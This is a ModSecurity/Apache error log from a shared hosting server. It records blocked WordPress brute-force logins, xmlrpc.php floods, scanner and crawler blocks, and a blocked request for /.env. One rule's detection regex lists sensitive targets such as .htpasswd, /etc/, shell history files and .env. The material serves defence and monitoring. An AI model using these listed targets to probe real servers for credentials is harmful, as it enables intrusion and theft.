[Tue May 26 19:29:42.214270 2026] [security2:error] [pid 49598:tid 49630] [remote 103.95.119.103:45502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnTuzJzkdc0Wtdrwtm2wAAxx8"]
[Tue May 26 19:29:42.298920 2026] [autoindex:error] [pid 49598:tid 49846] [client 185.169.4.152:65410] AH01276: Cannot serve directory /home1/taote1zo/public_html/afstpaul.org/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:29:42.476844 2026] [security2:error] [pid 49598:tid 49748] [client 91.245.236.124:52231] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnTuzJzkdc0Wtdrwtm6gAAAJk"]
[Tue May 26 19:29:42.477002 2026] [security2:error] [pid 49598:tid 49748] [client 91.245.236.124:52231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnTuzJzkdc0Wtdrwtm6gAAAJk"]
[Tue May 26 19:29:42.524189 2026] [security2:error] [pid 49598:tid 49664] [remote 142.44.220.132:43946] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "fonefix.in"] [uri "/"] [unique_id "ahWnTuzJzkdc0Wtdrwtm7wAArkE"]
[Tue May 26 19:29:42.524365 2026] [security2:error] [pid 49598:tid 49769] [client 142.44.220.132:43946] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "fonefix.in"] [uri "/"] [unique_id "ahWnTuzJzkdc0Wtdrwtm7wAArkE"]
[Tue May 26 19:29:42.595101 2026] [security2:error] [pid 49598:tid 49634] [remote 178.104.164.71:53422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWnTuzJzkdc0Wtdrwtm4QAAoSM"]
[Tue May 26 19:29:42.723482 2026] [security2:error] [pid 49598:tid 49647] [remote 78.142.18.172:36588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnTuzJzkdc0Wtdrwtm8wAA9DA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:29:42.891709 2026] [security2:error] [pid 49598:tid 49752] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnTuzJzkdc0Wtdrwtm5wAAAJ0"]
[Tue May 26 19:29:43.249784 2026] [security2:error] [pid 49598:tid 49800] [client 91.245.236.124:60919] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnT-zJzkdc0WtdrwtnBAAAAM0"]
[Tue May 26 19:29:43.249907 2026] [security2:error] [pid 49598:tid 49800] [client 91.245.236.124:60919] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnT-zJzkdc0WtdrwtnBAAAAM0"]
[Tue May 26 19:29:43.392145 2026] [security2:error] [pid 49598:tid 49665] [remote 103.95.119.103:33330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWnT-zJzkdc0WtdrwtnBQAAukI"]
[Tue May 26 19:29:43.599920 2026] [security2:error] [pid 49598:tid 49848] [client 69.58.72.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnT-zJzkdc0WtdrwtnDgAAAP0"], referer: https://www.anujtradingco.com/
[Tue May 26 19:29:44.014228 2026] [security2:error] [pid 49598:tid 49810] [client 91.245.236.124:52399] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnUOzJzkdc0WtdrwtnGgAAANc"]
[Tue May 26 19:29:44.014355 2026] [security2:error] [pid 49598:tid 49810] [client 91.245.236.124:52399] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnUOzJzkdc0WtdrwtnGgAAANc"]
[Tue May 26 19:29:44.068102 2026] [security2:error] [pid 49598:tid 49648] [remote 103.95.119.103:33330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWnT-zJzkdc0WtdrwtnGQAAvTE"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:29:44.362619 2026] [security2:error] [pid 49598:tid 49785] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnT-zJzkdc0WtdrwtnGAAAAL4"]
[Tue May 26 19:29:44.781483 2026] [security2:error] [pid 49598:tid 49789] [client 91.245.236.124:49861] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnUOzJzkdc0WtdrwtnLQAAAMI"]
[Tue May 26 19:29:44.781602 2026] [security2:error] [pid 49598:tid 49789] [client 91.245.236.124:49861] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnUOzJzkdc0WtdrwtnLQAAAMI"]
[Tue May 26 19:29:45.451061 2026] [security2:error] [pid 49598:tid 49849] [client 69.58.72.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnUezJzkdc0WtdrwtnQAAAAP4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1269849&moderation-hash=5a00b3e0d5559545a0ec6d41c5cec4a8
[Tue May 26 19:29:45.545658 2026] [security2:error] [pid 49598:tid 49758] [client 91.245.236.124:10151] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnUezJzkdc0WtdrwtnQQAAAKM"]
[Tue May 26 19:29:45.545778 2026] [security2:error] [pid 49598:tid 49758] [client 91.245.236.124:10151] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnUezJzkdc0WtdrwtnQQAAAKM"]
[Tue May 26 19:29:45.751707 2026] [security2:error] [pid 49598:tid 49661] [remote 74.7.241.162:38890] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "gloflorc.com.glorodavionics.com"] [uri "/index.php"] [unique_id "ahWnUezJzkdc0WtdrwtnNAAA6j4"]
[Tue May 26 19:29:46.088978 2026] [security2:error] [pid 49598:tid 49740] [client 195.2.67.184:64436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 184.67.2.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahWnUuzJzkdc0WtdrwtnTgAAAJE"], referer: http://toronto121mortgage.com/index.php?error=error
[Tue May 26 19:29:46.316647 2026] [security2:error] [pid 49598:tid 49750] [client 91.245.236.124:19729] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnUuzJzkdc0WtdrwtnWQAAAJs"]
[Tue May 26 19:29:46.316766 2026] [security2:error] [pid 49598:tid 49750] [client 91.245.236.124:19729] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnUuzJzkdc0WtdrwtnWQAAAJs"]
[Tue May 26 19:29:47.142153 2026] [security2:error] [pid 49598:tid 49849] [client 74.7.241.148:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWnU-zJzkdc0WtdrwtndAAAAP4"]
[Tue May 26 19:29:47.155686 2026] [security2:error] [pid 49598:tid 49851] [client 74.7.241.148:44442] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.glorodrc.com"] [uri "/robots.txt"] [unique_id "ahWnU-zJzkdc0WtdrwtncgABAEY"]
[Tue May 26 19:29:47.226839 2026] [security2:error] [pid 49598:tid 49798] [client 91.245.236.124:45103] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnU-zJzkdc0WtdrwtnfAAAAMs"]
[Tue May 26 19:29:47.226958 2026] [security2:error] [pid 49598:tid 49798] [client 91.245.236.124:45103] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnU-zJzkdc0WtdrwtnfAAAAMs"]
[Tue May 26 19:29:47.311950 2026] [security2:error] [pid 49598:tid 49800] [client 31.57.184.107:60133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "sputnyx.ru.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWnU-zJzkdc0WtdrwtneAAAAM0"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 19:29:47.346310 2026] [security2:error] [pid 49598:tid 49737] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnUuzJzkdc0WtdrwtnbAAAAI4"]
[Tue May 26 19:29:48.009696 2026] [security2:error] [pid 49598:tid 49848] [client 91.245.236.124:62087] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnVOzJzkdc0WtdrwtnkwAAAP0"]
[Tue May 26 19:29:48.009805 2026] [security2:error] [pid 49598:tid 49848] [client 91.245.236.124:62087] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnVOzJzkdc0WtdrwtnkwAAAP0"]
[Tue May 26 19:29:48.458245 2026] [autoindex:error] [pid 49598:tid 49643] [remote 89.116.26.221:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:29:48.790113 2026] [security2:error] [pid 49598:tid 49820] [client 91.245.236.124:60165] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnVOzJzkdc0WtdrwtnrgAAAOE"]
[Tue May 26 19:29:48.790467 2026] [security2:error] [pid 49598:tid 49820] [client 91.245.236.124:60165] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnVOzJzkdc0WtdrwtnrgAAAOE"]
[Tue May 26 19:29:49.017223 2026] [security2:error] [pid 49598:tid 49689] [remote 103.11.102.106:39020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnVOzJzkdc0WtdrwtntAAA31o"]
[Tue May 26 19:29:49.537833 2026] [security2:error] [pid 49598:tid 49804] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnVezJzkdc0WtdrwtnugAAANE"]
[Tue May 26 19:29:49.554565 2026] [security2:error] [pid 49598:tid 49781] [client 91.245.236.124:41779] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnVezJzkdc0WtdrwtnygAAALo"]
[Tue May 26 19:29:49.554694 2026] [security2:error] [pid 49598:tid 49781] [client 91.245.236.124:41779] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnVezJzkdc0WtdrwtnygAAALo"]
[Tue May 26 19:29:49.831283 2026] [security2:error] [pid 49598:tid 49844] [client 114.119.140.190:41861] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "senoro.com.mx"] [uri "/clientes-permanentes"] [unique_id "ahWnVezJzkdc0Wtdrwtn0QAAAPk"], referer: http://senoro.com.mx/clientes-permanentes
[Tue May 26 19:29:50.707597 2026] [security2:error] [pid 49598:tid 49769] [client 185.191.171.16:37386] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-17-21/list/"] [unique_id "ahWnVuzJzkdc0Wtdrwtn7AAAAK4"]
[Tue May 26 19:29:50.707746 2026] [security2:error] [pid 49598:tid 49769] [client 185.191.171.16:37386] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-17-21/list/"] [unique_id "ahWnVuzJzkdc0Wtdrwtn7AAAAK4"]
[Tue May 26 19:29:50.808794 2026] [security2:error] [pid 49598:tid 49789] [client 91.245.236.124:61501] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnVuzJzkdc0Wtdrwtn5wAAAMI"]
[Tue May 26 19:29:50.808947 2026] [security2:error] [pid 49598:tid 49789] [client 91.245.236.124:61501] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnVuzJzkdc0Wtdrwtn5wAAAMI"]
[Tue May 26 19:29:50.987954 2026] [security2:error] [pid 49598:tid 49756] [client 47.128.51.60:32294] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gcirsm.org.in"] [uri "/robots.txt"] [unique_id "ahWnVuzJzkdc0Wtdrwtn-QAAAKE"]
[Tue May 26 19:29:51.267598 2026] [security2:error] [pid 49598:tid 49737] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnVuzJzkdc0Wtdrwtn7wAAAI4"]
[Tue May 26 19:29:51.589510 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:63393] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnV-zJzkdc0WtdrwtoAAAAANU"]
[Tue May 26 19:29:51.589639 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:63393] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnV-zJzkdc0WtdrwtoAAAAANU"]
[Tue May 26 19:29:51.751859 2026] [security2:error] [pid 49598:tid 49794] [client 176.65.139.238:64098] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "clicshopping.azurmediatec.com"] [uri "/.env"] [unique_id "ahWnV-zJzkdc0WtdrwtoDQAAAMc"]
[Tue May 26 19:29:52.367505 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:58333] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnWOzJzkdc0WtdrwtoGAAAAOc"]
[Tue May 26 19:29:52.367637 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:58333] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnWOzJzkdc0WtdrwtoGAAAAOc"]
[Tue May 26 19:29:53.145525 2026] [security2:error] [pid 49598:tid 49748] [client 91.245.236.124:59947] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnWezJzkdc0WtdrwtoMwAAAJk"]
[Tue May 26 19:29:53.145643 2026] [security2:error] [pid 49598:tid 49748] [client 91.245.236.124:59947] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnWezJzkdc0WtdrwtoMwAAAJk"]
[Tue May 26 19:29:53.925924 2026] [security2:error] [pid 49598:tid 49777] [client 91.245.236.124:17657] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnWezJzkdc0WtdrwtoUAAAALY"]
[Tue May 26 19:29:53.926064 2026] [security2:error] [pid 49598:tid 49777] [client 91.245.236.124:17657] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnWezJzkdc0WtdrwtoUAAAALY"]
[Tue May 26 19:29:53.956496 2026] [security2:error] [pid 49598:tid 49788] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnWezJzkdc0WtdrwtoRgAAAME"]
[Tue May 26 19:29:54.081328 2026] [security2:error] [pid 49598:tid 49711] [remote 119.18.52.246:35368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWnWezJzkdc0WtdrwtoUQAA7HA"]
[Tue May 26 19:29:54.320863 2026] [security2:error] [pid 49598:tid 49709] [remote 216.251.35.203:43396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnWuzJzkdc0WtdrwtoWwAAkm4"]
[Tue May 26 19:29:54.558364 2026] [security2:error] [pid 49598:tid 49599] [remote 216.251.35.203:43396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnWuzJzkdc0WtdrwtoYQAA8QA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:29:54.638481 2026] [security2:error] [pid 49598:tid 49813] [client 114.119.152.54:63143] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/teklif"] [unique_id "ahWnWuzJzkdc0WtdrwtoYgAAANo"], referer: https://www.cagmedya.com/teklif
